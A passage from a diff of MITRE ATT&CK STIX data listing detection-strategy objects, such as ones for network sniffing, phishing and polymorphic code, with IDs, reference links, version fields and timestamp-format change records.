+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0337",
+                            "external_id": "DET0337"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Modify Cloud Compute Infrastructure: Revert Cloud Instance",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4eaeffc2-bdfa-427c-a009-daadee39457d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fdcd77fc-d6da-4692-a978-461a7f7dba61",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0155",
+                            "external_id": "DET0155"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Modify Cloud Resource Hierarchy",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e246212e-aca3-489d-a2d9-7e24f7c3516c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--536eed5d-a4b6-4377-a936-90283bb1b25c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0170",
+                            "external_id": "DET0170"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Modify System Image on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--868abb22-3d6c-4172-bf38-9e3c1aba4dae"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5dab1bc7-89e2-4fe4-ae30-40b550d0daf4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0160",
+                            "external_id": "DET0160"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Multi-Factor Authentication Request Generation (T1621)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f51edea3-e0e8-4090-8e81-a01c3394ba53",
+                        "x-mitre-analytic--824db63f-2a2c-4e3e-8e7d-49110cc63173",
+                        "x-mitre-analytic--2c0df764-d9bd-4a91-808a-aa13df13511a",
+                        "x-mitre-analytic--e36b2d32-05a8-4bcf-b7cf-58dc3ad4c0d3",
+                        "x-mitre-analytic--e96b0210-f7d5-43ac-bf73-893f243f6015",
+                        "x-mitre-analytic--801a3652-8772-4b69-8a13-d870be653ef0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--08f7fa2b-13f3-4348-83b8-023c2a68493f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0432",
+                            "external_id": "DET0432"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for NTFS File Attribute Abuse (ADS/EAs)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dba3fe8d-6080-4efe-9b93-6eda138ac771"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8d407bff-f721-4b74-a593-1e55c14c5263",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0575",
+                            "external_id": "DET0575"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Netsh Helper DLL Persistence via Registry and Child Process Monitoring (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5ca1b37f-31c9-414b-9a31-9f80f553c44a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--218a24ca-9534-44e2-9282-fb08373e7845",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0163",
+                            "external_id": "DET0163"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Network Address Translation Traversal",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--72033f2d-a943-40be-862c-051317ec541c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f0f7aa93-71bc-4c55-9f96-9c74a7d45a83",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0006",
+                            "external_id": "DET0006"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Network Boundary Bridging",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--32d56b42-ff83-46d2-aeea-57a6958d3e83"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f3bc6ce9-29ad-4ad4-813c-1a4176b5c7a2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0233",
+                            "external_id": "DET0233"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Network Device Configuration Dump via Config Repositories",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--58e73108-657e-42ce-8dad-4edc968a2b20"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--49505f6d-b778-4a84-a072-9236b700e7b5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0314",
+                            "external_id": "DET0314"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Network Sniffing Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b3579b0f-7daf-40bd-af1c-f5cd020942e6",
+                        "x-mitre-analytic--01ef3337-0585-4eaa-acb2-df363f7d5463",
+                        "x-mitre-analytic--31098e90-e2a0-477f-80ca-e969430d54c2",
+                        "x-mitre-analytic--4c4941eb-b087-4710-8c88-ff537c2309ff",
+                        "x-mitre-analytic--25403649-ce66-4fb0-9957-8c319b10e9d7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cc8324a7-03d0-47d1-8e2b-3caec44fc129",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0227",
+                            "external_id": "DET0227"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Non-Standard Ports",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9ea7f21e-700f-4900-a1d4-dfc171d399fe",
+                        "x-mitre-analytic--dba32c3a-1ae7-46a4-9b04-d011f37aa801",
+                        "x-mitre-analytic--785c44d0-7e5b-4d3e-a3cd-0c5e96b8891b",
+                        "x-mitre-analytic--4e3afe58-e384-4b9e-9137-adaa0bac72af"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9c2a1b83-eec8-4d0c-a0b5-e5b561dbd68f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0553",
+                            "external_id": "DET0553"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Obfuscated Files or Information: Binary Padding",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f9079cb0-76ff-4b4a-a73c-4f6572e7eef5",
+                        "x-mitre-analytic--5523b4ab-42b1-480a-854b-819879905f8d",
+                        "x-mitre-analytic--d27caeb7-7af2-4a55-9dcb-734730c0ccf1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8f268381-938f-454e-8d19-f266b69958ea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0164",
+                            "external_id": "DET0164"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Overwritten Process Arguments Masquerading",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--10d8886b-6cf6-45af-b187-04541e2ffaa4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ca16d7e8-77f3-4d0c-88a3-31696224ed67",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0469",
+                            "external_id": "DET0469"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Patch System Image on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bf64c48c-5834-426c-be21-6db0efbc7909"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7ee73f2e-76b2-4f00-bcc0-7fb79d31d344",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0070",
+                            "external_id": "DET0070"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Phishing across platforms.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5ea048cd-f1d5-4da2-9128-10c53ee337c8",
+                        "x-mitre-analytic--c5fe5b29-c56f-4c40-b880-051ec6644600",
+                        "x-mitre-analytic--2a0cc1a9-db3b-4f05-8c85-29d69507418b",
+                        "x-mitre-analytic--46ecb875-0842-4171-bb36-9b361453a89f",
+                        "x-mitre-analytic--09df0b88-e1ae-4a1e-86c4-8bb00e79baed",
+                        "x-mitre-analytic--4da63d13-d9bb-41c6-88c8-31bc9f2579fb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0548423e-c893-4474-9e5d-7fdd7c2a0a71",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0109",
+                            "external_id": "DET0109"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Plist File Modification (T1647)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--481966ed-de78-42e4-9c51-c69281a21650"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cad3cfb6-1838-4fa3-abfc-aa590f613436",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0533",
+                            "external_id": "DET0533"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Poisoned Pipeline Execution via SaaS CI/CD Workflows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0391c880-fcb3-457f-b625-18f9453659b8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--380da3b2-d92f-4361-b187-cedc8a118e0f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0324",
+                            "external_id": "DET0324"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Polymorphic Code Mutation and Execution",
